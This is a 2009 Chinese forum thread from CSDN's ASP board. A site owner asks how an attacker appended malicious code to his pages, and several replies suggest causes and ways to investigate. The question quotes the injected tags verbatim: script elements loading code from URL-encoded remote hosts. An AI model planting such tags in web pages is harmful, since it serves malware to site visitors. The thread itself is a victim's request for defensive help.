如何植入的", "upDate": "2021-05-28T16:12:25+08:00" }
社区
ASP
帖子详情
如何植入的
wxlkeepmoving
2009-08-31 09:34:33
如题,最近我的网站被挂马了。asp+access的网站。查看源文件,在一些源文件的底部</html>的后面多了<script src=http://%76%63%63%64%2E%63%6E></script>的代码。我想知道,
黑我网站的人是怎样把这句话写入我的源文件里的呢
?有点菜的问题,希望高手不吝赐教。
...全文
225
9
打赏
收藏
<script src=http://%76%63%63%64%2E%63%6E></script>如何植入的
如题,最近我的网站被挂马了。asp+access的网站。查看源文件,在一些源文件的底部的后面多了的代码。我想知道,黑我网站的人是怎样把这句话写入我的源文件里的呢?有点菜的问题,希望高手不吝赐教。
复制链接
扫一扫
分享
转发到动态
举报
AI
作业
写回复
配置赞助广告
用AI写文章
9 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
Dogfish
2009-09-01
打赏
举报
回复
一打开这个页面,我的电脑就警告。
方法类似
http://blog.csdn.net/dogfish/archive/2009/01/23/3851027.aspx
Dogfish
2009-09-01
打赏
举报
回复
sql注入。
coollele
2009-09-01
打赏
举报
回复
我前段时遇到黑我网站的人不是写到源代码,而是写入数据库每个字段里,在网上查了查,是SQL注入; 后来通过日志查到他用的是二进制代码通过页面的录入框写入的;
一般的防SQL注入对它不起作用; 最后通过查检录入字符长度来限制;
问题解决.
凡夫与俗子
2009-09-01
打赏
举报
回复
先排除局域网中毒
确定是自己网站以后
研究自己网站那些文件做了手脚
然后研究日志,看看有什么蛛丝马迹,顺藤摸瓜
凡夫与俗子
2009-09-01
打赏
举报
回复
N种可能。
例如,程序没有过滤传入字符
例如,后台使用弱密码
例如,上传没有过滤危险文件
例如,同服务器站点被黑
例如,同局域网中了arp,(加入源码没有这段,但网页上有,那一般就是这个。)
fxcjy
2009-09-01
打赏
举报
回复
有可能是主机漏洞
jypcxgzl
2009-09-01
打赏
举报
回复
肯定你的网站哪儿有漏洞被利用了。
wxlkeepmoving
2009-09-01
打赏
举报
回复
我的数据库没有被改变。只是我的源代码里多了这么一句<script src=http://%76%63%63%64%2E%63%6E> </script>,这是怎么回事呢?
如我的网页文件的结尾:
</body>
</html>
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>。
结尾就是无缘无故的多了这么一句,黑我网站的人是怎么写入的呢?不明白?
hblhshb
2009-09-01
打赏
举报
回复
如果有FSO组件权限的话写个循环,给你的所有.asp文件写入段代码是非常简单的
javaweb课设报告.doc
javaweb课设报告.doc
项目管理绩效考核管理办法.doc
项目管理绩效考核管理办法.doc
blend2d静态库gcc预编译版
blend2d静态库gcc预编译版
第7章-PLC控制系统设计.ppt
第7章-PLC控制系统设计.ppt
大数据知识竞赛试题.doc
大数据知识竞赛试题.doc
ASP
28,409
社区成员
356,971
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章